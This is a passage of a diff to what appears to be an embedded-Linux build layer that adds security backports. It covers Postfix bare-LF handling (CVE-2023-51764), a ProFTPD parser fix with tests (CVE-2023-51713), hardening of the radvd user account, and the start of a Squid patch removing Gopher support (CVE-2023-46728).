'\r') ++ vstring_truncate(vp, VSTRING_LEN(vp) - 1); ++ } + VSTRING_TERMINATE(vp); + /* FALLTRHOUGH */ + +--- a/src/global/smtp_stream.h ++++ b/src/global/smtp_stream.h +@@ -32,7 +32,6 @@ + #define SMTP_ERR_QUIET 3 /* silent cleanup (application) */ + #define SMTP_ERR_NONE 4 /* non-error case */ + #define SMTP_ERR_DATA 5 /* application data error */ +-#define SMTP_ERR_LF 6 /* bare <LF> protocol error */ + + extern void smtp_stream_setup(VSTREAM *, int, int); + extern void PRINTFLIKE(2, 3) smtp_printf(VSTREAM *, const char *,...); +@@ -44,7 +43,8 @@ + extern void smtp_fwrite(const char *, ssize_t len, VSTREAM *); + extern void smtp_fread_buf(VSTRING *, ssize_t len, VSTREAM *); + extern void smtp_fputc(int, VSTREAM *); +-extern int smtp_forbid_bare_lf; ++extern int smtp_detect_bare_lf; ++extern int smtp_got_bare_lf; + + extern void smtp_vprintf(VSTREAM *, const char *, va_list); + +--- a/src/smtpd/smtpd.c ++++ b/src/smtpd/smtpd.c +@@ -765,12 +765,17 @@ + /* .PP + /* Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: + /* .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" +-/* Reply with "Error: bare <LF> received" and disconnect +-/* when a remote SMTP client sends a line ending in <LF>, violating +-/* the RFC 5321 requirement that lines must end in <CR><LF>. ++/* Reject or restrict input lines from an SMTP client that end in ++/* <LF> instead of the standard <CR><LF>. + /* .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" + /* Exclude the specified clients from smtpd_forbid_bare_newline + /* enforcement. ++/* .PP ++/* Available in Postfix 3.9, 3.8.5, 3.7.10, 3.6.14, 3.5.24 and ++/* later: ++/* .IP "\fBsmtpd_forbid_bare_newline_reject_code (550)\fR" ++/* The numerical Postfix SMTP server response code when rejecting a ++/* request with "smtpd_forbid_bare_newline = reject". + /* TARPIT CONTROLS + /* .ad + /* .fi +@@ -1476,8 +1481,10 @@ + int var_smtpd_uproxy_tmout; + bool var_relay_before_rcpt_checks; + +-bool var_smtpd_forbid_bare_lf; ++char *var_smtpd_forbid_bare_lf; + char *var_smtpd_forbid_bare_lf_excl; ++int var_smtpd_forbid_bare_lf_code; ++static int bare_lf_mask; + static NAMADR_LIST *bare_lf_excl; + + /* +@@ -1554,7 +1561,6 @@ + #define REASON_TIMEOUT "timeout" + #define REASON_LOST_CONNECTION "lost connection" + #define REASON_ERROR_LIMIT "too many errors" +-#define REASON_BARE_LF "bare <LF> received" + + #ifdef USE_TLS + +@@ -1573,6 +1579,40 @@ + */ + static DICT *smtpd_cmd_filter; + ++ /* ++ * Bare LF and End-of-DATA controls (bare CR is handled elsewhere). ++ * ++ * At the smtp_get*() line reader level, setting any of these flags in the ++ * smtp_detect_bare_lf variable enables the detection of bare newlines. The ++ * line reader will set the same flags in the smtp_got_bare_lf variable ++ * after it detects a bare newline, otherwise it clears smtp_got_bare_lf. ++ * ++ * At the SMTP command level, the flags in smtp_got_bare_lf control whether ++ * commands ending in a bare newline are rejected. ++ * ++ * At the DATA and BDAT content level, the flags in smtp_got_bare_lf control ++ * whether the standard End-of-DATA sequence CRLF.CRLF is required, and ++ * whether lines ending in bare newlines are rejected. ++ * ++ * Postfix implements "delayed reject" after detecting a bare newline in BDAT ++ * or DATA content. The SMTP server delays a REJECT response until the ++ * command is finished, instead of replying and hanging up immediately. The ++ * End-of-DATA detection is secured with BARE_LF_FLAG_WANT_STD_EOD. ++ */ ++#define BARE_LF_FLAG_WANT_STD_EOD (1<<0) /* Require CRLF.CRLF */ ++#define BARE_LF_FLAG_REPLY_REJECT (1<<1) /* Reject bare newline */ ++ ++#define IS_BARE_LF_WANT_STD_EOD(m) ((m) & BARE_LF_FLAG_WANT_STD_EOD) ++#define IS_BARE_LF_REPLY_REJECT(m) ((m) & BARE_LF_FLAG_REPLY_REJECT) ++ ++static const NAME_CODE bare_lf_mask_table[] = { ++ "normalize", BARE_LF_FLAG_WANT_STD_EOD, /* Default */ ++ "yes", BARE_LF_FLAG_WANT_STD_EOD, /* Migration aid */ ++ "reject", BARE_LF_FLAG_WANT_STD_EOD | BARE_LF_FLAG_REPLY_REJECT, ++ "no", 0, ++ 0, -1, /* error */ ++}; ++ + #ifdef USE_SASL_AUTH + + /* +@@ -3515,6 +3555,7 @@ + int curr_rec_type; + int prev_rec_type; + int first = 1; ++ int prev_got_bare_lf = 0; + + /* + * Copy the message content. If the cleanup process has a problem, keep +@@ -3528,12 +3569,15 @@ + * XXX Deal with UNIX-style From_ lines at the start of message content + * because sendmail permits it. + */ +- for (prev_rec_type = 0; /* void */ ; prev_rec_type = curr_rec_type) { ++ for (prev_rec_type = 0; /* void */ ; prev_rec_type = curr_rec_type, ++ prev_got_bare_lf = smtp_got_bare_lf) { + if (smtp_get(state->buffer, state->client, var_line_limit, + SMTP_GET_FLAG_NONE) == '\n') + curr_rec_type = REC_TYPE_NORM; + else + curr_rec_type = REC_TYPE_CONT; ++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf)) ++ state->err |= CLEANUP_STAT_BARE_LF; + start = vstring_str(state->buffer); + len = VSTRING_LEN(state->buffer); + if (first) { +@@ -3546,9 +3590,14 @@ + if (len > 0 && IS_SPACE_TAB(start[0])) + out_record(out_stream, REC_TYPE_NORM, "", 0); + } +- if (prev_rec_type != REC_TYPE_CONT && *start == '.' +- && (proxy == 0 ? (++start, --len) == 0 : len == 1)) +- break; ++ if (prev_rec_type != REC_TYPE_CONT && *start == '.') { ++ if (len == 1 && IS_BARE_LF_WANT_STD_EOD(smtp_detect_bare_lf) ++ && (smtp_got_bare_lf || prev_got_bare_lf)) ++ /* Do not store or send to proxy filter. */ ++ continue; ++ if (proxy == 0 ? (++start, --len) == 0 : len == 1) ++ break; ++ } + if (state->err == CLEANUP_STAT_OK) { + if (ENFORCING_SIZE_LIMIT(var_message_limit) + && var_message_limit - state->act_size < len + 2) { +@@ -3701,6 +3750,11 @@ + else + smtpd_chat_reply(state, + "250 2.0.0 Ok: queued as %s", state->queue_id); ++ } else if ((state->err & CLEANUP_STAT_BARE_LF) != 0) { ++ state->error_mask |= MAIL_ERROR_PROTOCOL; ++ log_whatsup(state, "reject", "bare <LF> received"); ++ smtpd_chat_reply(state, "%d 5.5.2 %s Error: bare <LF> received", ++ var_smtpd_forbid_bare_lf_code, var_myhostname); + } else if (why && IS_SMTP_REJECT(STR(why))) { + state->error_mask |= MAIL_ERROR_POLICY; + smtpd_chat_reply(state, "%s", STR(why)); +@@ -3981,7 +4035,6 @@ + */ + done = 0; + do { +- int payload_err; + + /* + * Do not skip the smtp_fread_buf() call if read_len == 0. We still +@@ -3995,10 +4048,6 @@ + smtp_fread_buf(state->buffer, read_len, state->client); + state->bdat_get_stream = vstream_memreopen( + state->bdat_get_stream, state->buffer, O_RDONLY); +- vstream_control(state->bdat_get_stream, CA_VSTREAM_CTL_EXCEPT, +- CA_VSTREAM_CTL_END); +- if ((payload_err = vstream_setjmp(state->bdat_get_stream)) != 0) +- vstream_longjmp(state->client, payload_err); + + /* + * Read lines from the fragment. The last line may continue in the +@@ -4023,6 +4072,8 @@ + /* Skip the out_record() and VSTRING_RESET() calls below. */ + break; + } ++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf)) ++ state->err |= CLEANUP_STAT_BARE_LF; + start = vstring_str(state->bdat_get_buffer); + len = VSTRING_LEN(state->bdat_get_buffer); + if (state->err == CLEANUP_STAT_OK) { +@@ -4674,9 +4725,9 @@ + */ + xclient_allowed = + namadr_list_match(xclient_hosts, state->name, state->addr); +- smtp_forbid_bare_lf = SMTPD_STAND_ALONE((state)) == 0 +- && var_smtpd_forbid_bare_lf +- && !namadr_list_match(bare_lf_excl, state->name, state->addr); ++ smtp_detect_bare_lf = (SMTPD_STAND_ALONE((state)) == 0 && bare_lf_mask ++ && !namadr_list_match(bare_lf_excl, state->name, state->addr)) ? ++ bare_lf_mask : 0; + /* NOT: tls_reset() */ + if (got_helo == 0) + helo_reset(state); +@@ -5468,13 +5519,6 @@ + var_myhostname); + break; + +- case SMTP_ERR_LF: +- state->reason = REASON_BARE_LF; +- if (vstream_setjmp(state->client) == 0) +- smtpd_chat_reply(state, "521 5.5.2 %s Error: bare <LF> received", +- var_myhostname); +- break; +- + case 0: + + /* +@@ -5676,6 +5720,13 @@ + } + watchdog_pat(); + smtpd_chat_query(state); ++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf)) { ++ log_whatsup(state, "reject", "bare <LF> received"); ++ state->error_mask |= MAIL_ERROR_PROTOCOL; ++ smtpd_chat_reply(state, "%d 5.5.2 %s Error: bare <LF> received", ++ var_smtpd_forbid_bare_lf_code, var_myhostname); ++ break; ++ } + /* Safety: protect internal interfaces against malformed UTF-8. */ + if (var_smtputf8_enable && valid_utf8_string(STR(state->buffer), + LEN(state->buffer)) == 0) { +@@ -6024,11 +6075,11 @@ + namadr_list_match(xforward_hosts, state.name, state.addr); + + /* +- * Enforce strict SMTP line endings, with compatibility exclusions. ++ * Reject or normalize bare LF, with compatibility exclusions. + */ +- smtp_forbid_bare_lf = SMTPD_STAND_ALONE((&state)) == 0 +- && var_smtpd_forbid_bare_lf +- && !namadr_list_match(bare_lf_excl, state.name, state.addr); ++ smtp_detect_bare_lf = (SMTPD_STAND_ALONE((&state)) == 0 && bare_lf_mask ++ && !namadr_list_match(bare_lf_excl, state.name, state.addr)) ? ++ bare_lf_mask : 0; + + /* + * See if we need to turn on verbose logging for this client. +@@ -6095,6 +6146,10 @@ + MATCH_FLAG_RETURN + | match_parent_style(VAR_MYNETWORKS), + var_smtpd_forbid_bare_lf_excl); ++ if ((bare_lf_mask = name_code(bare_lf_mask_table, NAME_CODE_FLAG_NONE, ++ var_smtpd_forbid_bare_lf)) < 0) ++ msg_fatal("bad parameter value: '%s = %s'", ++ VAR_SMTPD_FORBID_BARE_LF, var_smtpd_forbid_bare_lf); + + /* + * Open maps before dropping privileges so we can read passwords etc. +@@ -6390,6 +6445,7 @@ + VAR_VIRT_MAILBOX_CODE, DEF_VIRT_MAILBOX_CODE, &var_virt_mailbox_code, 0, 0, + VAR_RELAY_RCPT_CODE, DEF_RELAY_RCPT_CODE, &var_relay_rcpt_code, 0, 0, + VAR_PLAINTEXT_CODE, DEF_PLAINTEXT_CODE, &var_plaintext_code, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF_CODE, DEF_SMTPD_FORBID_BARE_LF_CODE, &var_smtpd_forbid_bare_lf_code, 500, 599, + VAR_SMTPD_CRATE_LIMIT, DEF_SMTPD_CRATE_LIMIT, &var_smtpd_crate_limit, 0, 0, + VAR_SMTPD_CCONN_LIMIT, DEF_SMTPD_CCONN_LIMIT, &var_smtpd_cconn_limit, 0, 0, + VAR_SMTPD_CMAIL_LIMIT, DEF_SMTPD_CMAIL_LIMIT, &var_smtpd_cmail_limit, 0, 0, +@@ -6452,7 +6508,6 @@ + VAR_SMTPD_PEERNAME_LOOKUP, DEF_SMTPD_PEERNAME_LOOKUP, &var_smtpd_peername_lookup, + VAR_SMTPD_DELAY_OPEN, DEF_SMTPD_DELAY_OPEN, &var_smtpd_delay_open, + VAR_SMTPD_CLIENT_PORT_LOG, DEF_SMTPD_CLIENT_PORT_LOG, &var_smtpd_client_port_log, +- VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, + 0, + }; + static const CONFIG_NBOOL_TABLE nbool_table[] = { +@@ -6569,6 +6624,7 @@ + VAR_SMTPD_DNS_RE_FILTER, DEF_SMTPD_DNS_RE_FILTER, &var_smtpd_dns_re_filter, 0, 0, + VAR_SMTPD_REJ_FTR_MAPS, DEF_SMTPD_REJ_FTR_MAPS, &var_smtpd_rej_ftr_maps, 0, 0, + VAR_SMTPD_FORBID_BARE_LF_EXCL, DEF_SMTPD_FORBID_BARE_LF_EXCL, &var_smtpd_forbid_bare_lf_excl, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, 1, 0, + 0, + }; + static const CONFIG_RAW_TABLE raw_table[] = { +--- a/src/smtpd/smtpd_check.c ++++ b/src/smtpd/smtpd_check.c +@@ -48,6 +48,11 @@ + /* + /* char *smtpd_check_queue(state) + /* SMTPD_STATE *state; ++/* AUXILIARY FUNCTIONS ++/* void log_whatsup(state, action, text) ++/* SMTPD_STATE *state; ++/* const char *action; ++/* const char *text; + /* DESCRIPTION + /* This module implements additional checks on SMTP client requests. + /* A client request is validated in the context of the session state. +@@ -146,6 +151,11 @@ + /* The recipient address given with the RCPT TO or VRFY command. + /* .IP size + /* The message size given with the MAIL FROM command (zero if unknown). ++/* .PP ++/* log_whatsup() logs "<queueid>: <action>: <protocol state> ++/* from: <client-name[client-addr]>: <text>" plus the protocol ++/* (SMTP or ESMTP), and if available, EHLO, MAIL FROM, or RCPT ++/* TO. + /* BUGS + /* Policies like these should not be hard-coded in C, but should + /* be user-programmable instead. +@@ -987,8 +997,8 @@ + + /* log_whatsup - log as much context as we have */ + +-static void log_whatsup(SMTPD_STATE *state, const char *whatsup, +- const char *text) ++void log_whatsup(SMTPD_STATE *state, const char *whatsup, ++ const char *text) + { + VSTRING *buf = vstring_alloc(100); + +--- a/src/smtpd/smtpd_check.h ++++ b/src/smtpd/smtpd_check.h +@@ -25,6 +25,7 @@ + extern char *smtpd_check_data(SMTPD_STATE *); + extern char *smtpd_check_eod(SMTPD_STATE *); + extern char *smtpd_check_policy(SMTPD_STATE *, char *); ++extern void log_whatsup(SMTPD_STATE *, const char *, const char *); + + /* LICENSE + /* .ad diff --git a/meta-networking/recipes-daemons/postfix/postfix_3.6.5.bb b/meta-networking/recipes-daemons/postfix/postfix_3.6.7.bb index 343a8b2df0..fdda2e749e 100644 --- a/meta-networking/recipes-daemons/postfix/postfix_3.6.5.bb +++ b/meta-networking/recipes-daemons/postfix/postfix_3.6.7.bb @@ -12,6 +12,9 @@ SRC_URI += "ftp://ftp.porcupine.org/mirrors/postfix-release/official/postfix-${P file://0003-makedefs-Use-native-compiler-to-build-makedefs.test.patch \ file://0004-Fix-icu-config.patch \ file://0005-makedefs-add-lnsl-and-lresolv-to-SYSLIBS-by-default.patch \ + file://0006-makedefs-Account-for-linux-6.x-version.patch \ + file://CVE-2023-51764-1.patch \ + file://CVE-2023-51764-2.patch \ " -SRC_URI[sha256sum] = "300fa8811cea20d01d25c619d359bffab82656e704daa719e0c9afc4ecff4808" +SRC_URI[sha256sum] = "e471df7e0eb11c4a1e574b6d7298f635386e2843b6b3584c25a04543d587e07f" UPSTREAM_CHECK_REGEX = "postfix\-(?P<pver>3\.6(\.\d+)+).tar.gz" diff --git a/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch b/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch new file mode 100644 index 0000000000..4b2cac1870 --- /dev/null +++ b/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch @@ -0,0 +1,277 @@ +From 97bbe68363ccf2de0c07f67170ec64a8b4d62592 Mon Sep 17 00:00:00 2001 +From: TJ Saunders <tj@castaglia.org> +Date: Sun, 6 Aug 2023 13:16:26 -0700 +Subject: [PATCH] Issue #1683: Avoid an edge case when handling unexpectedly + formatted input text from client, caused by quote/backslash semantics, by + skipping those semantics. + +Upstream-Status: Backport [https://github.com/proftpd/proftpd/commit/97bbe68363ccf2de0c07f67170ec64a8b4d62592] +CVE: CVE-2023-51713 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + include/str.h | 3 ++- + src/main.c | 34 +++++++++++++++++++++++++++++---- + src/str.c | 22 +++++++++++++--------- + tests/api/str.c | 50 ++++++++++++++++++++++++++++++++++++++++++++++++- + 4 files changed, 94 insertions(+), 15 deletions(-) + +diff --git a/include/str.h b/include/str.h +index f08398017..1261ae2c2 100644 +--- a/include/str.h ++++ b/include/str.h +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server daemon +- * Copyright (c) 2008-2020 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -131,6 +131,7 @@ const char *pr_gid2str(pool *, gid_t); + #define PR_STR_FL_PRESERVE_COMMENTS 0x0001 + #define PR_STR_FL_PRESERVE_WHITESPACE 0x0002 + #define PR_STR_FL_IGNORE_CASE 0x0004 ++#define PR_STR_FL_IGNORE_QUOTES 0x0008 + + char *pr_str_get_token(char **, char *); + char *pr_str_get_token2(char **, char *, size_t *); +diff --git a/src/main.c b/src/main.c +index ee9c1eecb..e6b70731d 100644 +--- a/src/main.c ++++ b/src/main.c +@@ -811,8 +811,24 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + return NULL; + } + ++ /* By default, pr_str_get_word will handle quotes and backslashes for ++ * escaping characters. This can produce words which are shorter, use ++ * fewer bytes than the corresponding input buffer. ++ * ++ * In this particular situation, we use the length of this initial word ++ * for determining the length of the remaining buffer bytes, assumed to ++ * contain the FTP command arguments. If this initial word is thus ++ * unexpectedly "shorter", due to nonconformant FTP text, it can lead ++ * the subsequent buffer scan, looking for CRNUL sequencees, to access ++ * unexpected memory addresses (Issue #1683). ++ * ++ * Thus for this particular situation, we tell the function to ignore/skip ++ * such quote/backslash semantics, and treat them as any other character ++ * using the IGNORE_QUOTES flag. ++ */ ++ + ptr = buf; +- wrd = pr_str_get_word(&ptr, str_flags); ++ wrd = pr_str_get_word(&ptr, str_flags|PR_STR_FL_IGNORE_QUOTES); + if (wrd == NULL) { + /* Nothing there...bail out. */ + pr_trace_msg("ctrl", 5, "command '%s' is empty, ignoring", buf); +@@ -820,6 +836,11 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + return NULL; + } + ++ /* Note that this first word is the FTP command. This is why we make ++ * use of the ptr buffer, which advances through the input buffer as ++ * we read words from the buffer. ++ */ ++ + subpool = make_sub_pool(p); + pr_pool_tag(subpool, "make_ftp_cmd pool"); + cmd = pcalloc(subpool, sizeof(cmd_rec)); +@@ -846,6 +867,7 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + arg_len = buflen - strlen(wrd); + arg = pcalloc(cmd->pool, arg_len + 1); + ++ /* Remember that ptr here is advanced past the first word. */ + for (i = 0, j = 0; i < arg_len; i++) { + pr_signals_handle(); + if (i > 1 && +@@ -854,14 +876,13 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + + /* Strip out the NUL by simply not copying it into the new buffer. */ + have_crnul = TRUE; ++ + } else { + arg[j++] = ptr[i]; + } + } + +- cmd->arg = arg; +- +- if (have_crnul) { ++ if (have_crnul == TRUE) { + char *dup_arg; + + /* Now make a copy of the stripped argument; this is what we need to +@@ -871,6 +892,11 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + ptr = dup_arg; + } + ++ cmd->arg = arg; ++ ++ /* Now we can read the remamining words, as command arguments, from the ++ * input buffer. ++ */ + while ((wrd = pr_str_get_word(&ptr, str_flags)) != NULL) { + pr_signals_handle(); + *((char **) push_array(tarr)) = pstrdup(cmd->pool, wrd); +diff --git a/src/str.c b/src/str.c +index bcca4ae4d..a2ff74daf 100644 +--- a/src/str.c ++++ b/src/str.c +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server daemon +- * Copyright (c) 2008-2017 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -1209,7 +1209,7 @@ int pr_str_get_nbytes(const char *str, const char *units, off_t *nbytes) { + + char *pr_str_get_word(char **cp, int flags) { + char *res, *dst; +- char quote_mode = 0; ++ int quote_mode = FALSE; + + if (cp == NULL || + !*cp || +@@ -1238,24 +1238,28 @@ char *pr_str_get_word(char **cp, int flags) { + } + } + +- if (**cp == '\"') { +- quote_mode++; +- (*cp)++; ++ if (!(flags & PR_STR_FL_IGNORE_QUOTES)) { ++ if (**cp == '\"') { ++ quote_mode = TRUE; ++ (*cp)++; ++ } + } + + while (**cp && (quote_mode ? (**cp != '\"') : !PR_ISSPACE(**cp))) { + pr_signals_handle(); + +- if (**cp == '\\' && quote_mode) { +- ++ if (**cp == '\\' && ++ quote_mode == TRUE) { + /* Escaped char */ + if (*((*cp)+1)) { +- *dst = *(++(*cp)); ++ *dst++ = *(++(*cp)); ++ (*cp)++; ++ continue; + } + } + + *dst++ = **cp; +- ++(*cp); ++ (*cp)++; + } + + if (**cp) { +diff --git a/tests/api/str.c b/tests/api/str.c +index 050f5c563..bc64f0fb0 100644 +--- a/tests/api/str.c ++++ b/tests/api/str.c +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server testsuite +- * Copyright (c) 2008-2017 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -695,19 +695,23 @@ END_TEST + START_TEST (get_word_test) { + char *ok, *res, *str; + ++ mark_point(); + res = pr_str_get_word(NULL, 0); + fail_unless(res == NULL, "Failed to handle null arguments"); + fail_unless(errno == EINVAL, "Failed to set errno to EINVAL"); + ++ mark_point(); + str = NULL; + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle null str argument"); + fail_unless(errno == EINVAL, "Failed to set errno to EINVAL"); + ++ mark_point(); + str = pstrdup(p, " "); + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle whitespace argument"); + ++ mark_point(); + str = pstrdup(p, " foo"); + res = pr_str_get_word(&str, PR_STR_FL_PRESERVE_WHITESPACE); + fail_unless(res != NULL, "Failed to handle whitespace argument: %s", +@@ -723,6 +727,7 @@ START_TEST (get_word_test) { + ok = "foo"; + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + ++ mark_point(); + str = pstrdup(p, " # foo"); + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle commented argument"); +@@ -742,6 +747,8 @@ START_TEST (get_word_test) { + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + + /* Test multiple embedded quotes. */ ++ ++ mark_point(); + str = pstrdup(p, "foo \"bar baz\" qux \"quz norf\""); + res = pr_str_get_word(&str, 0); + fail_unless(res != NULL, "Failed to handle quoted argument: %s", +@@ -770,6 +777,47 @@ START_TEST (get_word_test) { + + ok = "quz norf"; + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ ++ /* Test embedded quotes with backslashes (Issue #1683). */ ++ mark_point(); ++ ++ str = pstrdup(p, "\"\\\\SYST\""); ++ res = pr_str_get_word(&str, 0); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ ++ ok = "\\SYST"; ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ mark_point(); ++ str = pstrdup(p, "\"\"\\\\SYST"); ++ res = pr_str_get_word(&str, 0); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ ++ /* Note that pr_str_get_word() is intended to be called multiple times ++ * on an advancing buffer, effectively tokenizing the buffer. This is ++ * why the function does NOT decrement its quote mode. ++ */ ++ ok = ""; ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ /* Now do the same tests with the IGNORE_QUOTES flag */ ++ mark_point(); ++ ++ str = ok = pstrdup(p, "\"\\\\SYST\""); ++ res = pr_str_get_word(&str, PR_STR_FL_IGNORE_QUOTES); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ mark_point(); ++ str = ok = pstrdup(p, "\"\"\\\\SYST"); ++ res = pr_str_get_word(&str, PR_STR_FL_IGNORE_QUOTES); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + } + END_TEST + +-- +2.25.1 + diff --git a/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb b/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb index 686f1e5cdf..9d846f46a2 100644 --- a/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb +++ b/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb @@ -15,6 +15,7 @@ SRC_URI = "git://github.com/proftpd/proftpd.git;branch=${BRANCH};protocol=https file://contrib.patch \ file://build_fixup.patch \ file://proftpd.service \ + file://CVE-2023-51713.patch \ " S = "${WORKDIR}/git" diff --git a/meta-networking/recipes-daemons/radvd/radvd.inc b/meta-networking/recipes-daemons/radvd/radvd.inc index 2afaa48411..5da31b3f0e 100644 --- a/meta-networking/recipes-daemons/radvd/radvd.inc +++ b/meta-networking/recipes-daemons/radvd/radvd.inc @@ -58,7 +58,8 @@ do_install:append () { } USERADD_PACKAGES = "${PN}" -USERADD_PARAM:${PN} = "--system --home ${localstatedir}/run/radvd/ -M -g nogroup radvd" +GROUPADD_PARAM:${PN} = "--system nogroup" +USERADD_PARAM:${PN} = "--system --home ${localstatedir}/run/radvd/ -M -g nogroup --shell /sbin/nologin radvd" pkg_postinst:${PN} () { if [ -z "$D" -a -x /etc/init.d/populate-volatile.sh ]; then diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch new file mode 100644 index 0000000000..b11721041e --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch @@ -0,0 +1,608 @@ +Partial backport of: + +From 6ea12e8fb590ac6959e9356a81aa3370576568c3 Mon Sep 17 00:00:00 2001 +From: Alex Rousskov <rousskov@measurement-factory.com> +Date: Tue, 26 Jul 2022 15:05:54 +0000 +Subject: [PATCH] Remove support for Gopher protocol (#1092) + +Gopher code quality remains too low for production use in most +environments. The code is a persistent source of vulnerabilities and +fixing it requires significant effort. We should not be spending scarce +Project resources on improving that code, especially given the lack of +strong demand for Gopher support. + +With this change, Gopher requests will be handled like any other request +with an unknown (to Squid) protocol. For example, HTTP requests with +Gopher URI scheme result in ERR_UNSUP_REQ. + +Default Squid configuration still considers TCP port 70 "safe". The +corresponding Safe_ports ACL rule has not been removed for consistency +sake: We consider WAIS port safe even though Squid refuses to forward +WAIS requests: + + acl Safe_ports port 70 # gopher + acl Safe_ports port 210 # wais + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46728.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/6ea12e8fb590ac6959e9356a81aa3370576568c3] +CVE: CVE-2023-46728 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + doc/Programming-Guide/Groups.dox | 5 - + doc/debug-sections.txt | 1 - + doc/manuals/de.po | 2 +- + doc/manuals/en.po | 2 +- + doc/manuals/en_AU.po | 2 +- + doc/manuals/es.po | 2 +- + doc/manuals/fr.po | 2 +- + doc/manuals/it.po | 2 +- + errors/af.po | 6 +- + errors/az.po | 6 +- + errors/bg.po | 6 +- + errors/ca.po | 6 +- + errors/cs.po | 6 +- + errors/da.po | 6 +- + errors/de.po | 6 +- + errors/el.po | 4 +- + errors/en.po | 6 +- + errors/errorpage.css | 2 +- + errors/es-mx.po | 3 +- + errors/es.po | 4 +- + errors/et.po | 6 +- + errors/fi.po | 7 +- + errors/fr.po | 6 +- + errors/he.po | 6 +- + errors/hu.po | 6 +- + errors/hy.po | 6 +- + errors/it.po | 4 +- + errors/ja.po | 6 +- + errors/ko.po | 6 +- + errors/lt.po | 6 +- + errors/lv.po | 6 +- + errors/nl.po | 6 +- + errors/pl.po | 6 +- + errors/pt-br.po | 6 +- + errors/pt.po | 6 +- + errors/ro.po | 4 +- + errors/ru.po | 6 +- + errors/sk.po | 6 +- + errors/sl.po | 6 +- + errors/sr-latn.po | 4 +- + errors/sv.po | 6 +- + errors/templates/ERR_UNSUP_REQ | 2 +- + errors/tr.po | 6 +- + errors/uk.po | 6 +- + errors/vi.po | 4 +- + errors/zh-hans.po | 6 +- + errors/zh-hant.po | 7 +- + src/FwdState.cc | 5 - + src/HttpRequest.cc | 6 - + src/IoStats.h | 2 +- + src/Makefile.am | 8 - + src/adaptation/ecap/Host.cc | 1 - + src/adaptation/ecap/MessageRep.cc | 2 - + src/anyp/ProtocolType.h | 1 - + src/anyp/Uri.cc | 1 - + src/anyp/UriScheme.cc | 3 - + src/cf.data.pre | 5 +- + src/client_side_request.cc | 4 - + src/error/forward.h | 2 +- + src/gopher.cc | 993 ----------------------- + src/gopher.h | 29 - + src/http/Message.h | 1 - + src/mgr/IoAction.cc | 3 - + src/mgr/IoAction.h | 2 - + src/squid.8.in | 2 +- + src/stat.cc | 19 - + src/tests/Stub.am | 1 - + src/tests/stub_gopher.cc | 17 - + test-suite/squidconf/regressions-3.4.0.1 | 1 - + 69 files changed, 88 insertions(+), 1251 deletions(-) + delete mode 100644 src/gopher.cc + delete mode 100644 src/gopher.h + delete mode 100644 src/tests/stub_gopher.cc + +--- a/src/FwdState.cc ++++ b/src/FwdState.cc +@@ -28,7 +28,6 @@ + #include "fde.h" + #include "FwdState.h" + #include "globals.h" +-#include 